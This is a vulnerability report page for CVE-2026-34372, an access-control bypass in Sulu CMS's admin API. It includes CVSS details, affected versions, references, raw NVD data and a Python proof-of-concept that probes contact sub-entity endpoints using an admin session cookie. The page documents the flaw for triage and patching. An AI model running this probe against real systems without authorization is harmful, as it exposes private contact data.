Security Vulnerability Report
CVE-2026-34372 CVSS 2.7 LOW

CVE-2026-34372

Published: 2026-03-31 21:16:30
Last Modified: 2026-04-10 01:40:29

Description

Sulu is an open-source PHP content management system based on the Symfony framework. In versions 1.0.0 up to (but not including) 2.6.22, and 3.0.0 up to (but not including) 3.0.5, a user who has access to the Sulu Admin through at least one role could read the sub-entities of contacts through the admin API without holding any permission on contacts themselves (CWE-288: authorization check bypassed via an alternate path). The issue is patched in versions 2.6.22 and 3.0.5.

CVSS Details

CVSS Score
2.7
Severity
LOW (NVD CVSS 3.1, which assumes PR:H). Note that the vendor's CVSS 4.0 assessment in the raw record below scores the same issue 5.3 MEDIUM with PR:L, which matches the description's "at least one role" precondition; triage against the lower-privilege reading if any non-admin backend account exists on the instance.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sulu:sulu:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sulu:sulu:*:*:*:*:*:*:*:* - VULNERABLE
Sulu CMS >= 1.0.0, < 2.6.22
Sulu CMS >= 3.0.0, < 3.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
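"""PoC for CVE-2026-34372: Sulu CMS contact sub-entity access-control bypass.

Exploit Title: Sulu CMS Sub-entity Access Control Bypass (CVE-2026-34372)
Description: Exploits insufficient permission checks on contact sub-entities
via the Admin API.

Preconditions (per the advisory): a valid Sulu Admin session for a user who
holds at least one role but has NO permission on contacts. The probe is a
single read-only GET; it never modifies data. A 200 JSON response only proves
the bypass if the test account really lacks the contacts permission.

For security research and authorized testing only.
"""

import json
import urllib.error
import urllib.parse
import urllib.request

TARGET_URL = "http://target-sulu-instance.com"
# Attacker needs a valid session cookie of a user with at least one role in Admin
SESSION_COOKIE = "SESSION_ID_HERE"
CONTACT_ID = "1"  # ID of the target contact
# Symfony session cookie name. This is deployment-specific; copy the actual
# name from a logged-in browser session if the instance uses a different one.
SESSION_COOKIE_NAME = "PHPSESSID"
# Never block forever on an unresponsive host.
TIMEOUT_SECONDS = 10


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects.

    An expired/invalid session is typically bounced to the admin login page
    with a 302; following it would yield a 200 HTML page and a false
    "exploit successful" verdict.
    """

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def sub_entity_url(base_url: str, contact_id: str, sub_entity: str = "accounts") -> str:
    """Build the admin API URL for a contact sub-entity collection.

    ``sub_entity`` is one example sub-resource; the advisory does not name
    which sub-entities are affected, so other collections may be worth probing.
    """
    base = base_url.rstrip("/")
    cid = urllib.parse.quote(str(contact_id), safe="")
    return f"{base}/admin/api/contacts/{cid}/{sub_entity}"


def classify_response(status: int, content_type: str, body: str) -> tuple[str, str]:
    """Map an HTTP response to a ``(verdict, message)`` pair.

    Verdicts: ``vulnerable`` (200 with a JSON body), ``inconclusive`` (200 but
    not JSON, e.g. a login page), ``forbidden`` (403), ``unauthenticated``
    (401 or any 3xx, i.e. the session cookie was not accepted), ``unexpected``.
    """
    if status == 200:
        is_json = "json" in content_type.lower()
        if not is_json:
            try:
                json.loads(body)
                is_json = True
            except ValueError:
                is_json = False
        if is_json:
            return "vulnerable", "[+] Exploit successful! Sub-entity data retrieved:"
        return (
            "inconclusive",
            "[-] Got HTTP 200 but no JSON body (login page?); check the session cookie.",
        )
    if status == 403:
        return "forbidden", "[-] Access forbidden. Patched or permissions strict."
    if status == 401 or 300 <= status < 400:
        return (
            "unauthenticated",
            f"[-] Session not accepted (HTTP {status}); the cookie is invalid or expired.",
        )
    return "unexpected", f"[-] Unexpected status code: {status}"


def exploit(
    target_url: str = TARGET_URL,
    session_cookie: str = SESSION_COOKIE,
    contact_id: str = CONTACT_ID,
    sub_entity: str = "accounts",
) -> str:
    """Issue the probe request and print the outcome.

    Returns the verdict string from :func:`classify_response`, or ``"error"``
    when the request could not be completed at all.
    """
    endpoint = sub_entity_url(target_url, contact_id, sub_entity)
    # The endpoint should be restricted to users with specific 'contact'
    # permissions; Accept (not Content-Type) is the right header for a GET.
    headers = {
        "Cookie": f"{SESSION_COOKIE_NAME}={session_cookie}",
        "Accept": "application/json",
    }
    print(f"[*] Attempting to access sub-entity for contact ID: {contact_id}...")
    request = urllib.request.Request(endpoint, headers=headers, method="GET")
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(request, timeout=TIMEOUT_SECONDS) as response:
            status = response.status
            content_type = response.headers.get("Content-Type", "")
            body = response.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        # Non-2xx (and, with _NoRedirect, 3xx) land here; keep the details.
        status = err.code
        content_type = err.headers.get("Content-Type", "") if err.headers else ""
        body = err.read().decode("utf-8", errors="replace")
    except (urllib.error.URLError, OSError, ValueError) as err:
        print(f"[!] Error: {err}")
        return "error"
    verdict, message = classify_response(status, content_type, body)
    print(message)
    if verdict == "vulnerable":
        print(body)
    return verdict


if __name__ == "__main__":
    exploit()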

References

- Vendor advisory: https://github.com/sulu/sulu/security/advisories/GHSA-6h7h-m7p5-hjqp
- Fixed release (2.x): https://github.com/sulu/sulu/releases/tag/2.6.22
- Fixed release (3.x): https://github.com/sulu/sulu/releases/tag/3.0.5

Raw JSON Data

{"cve": {"id": "CVE-2026-34372", "sourceIdentifier": "[email protected]", "published": "2026-03-31T21:16:29.840", "lastModified": "2026-04-10T01:40:29.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sulu is an open-source PHP content management system based on the Symfony framework. From versions 1.0.0 to before 2.6.22, and 3.0.0 to before 3.0.5, a user which has permission for the Sulu Admin via at least one role could have access to the sub-entities of contacts via the admin API without even have permission for contacts. This issue has been patched in versions 2.6.22 and 3.0.5."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": 
"NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sulu:sulu:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "2.6.22", "matchCriteriaId": "BB27FC33-8473-4331-A2D4-4D40F97CB960"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sulu:sulu:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.5", "matchCriteriaId": "E9A4E47B-0184-4443-8B0C-B3CB341D65D4"}]}]}], "references": [{"url": "https://github.com/sulu/sulu/releases/tag/2.6.22", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/sulu/sulu/releases/tag/3.0.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/sulu/sulu/security/advisories/GHSA-6h7h-m7p5-hjqp", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}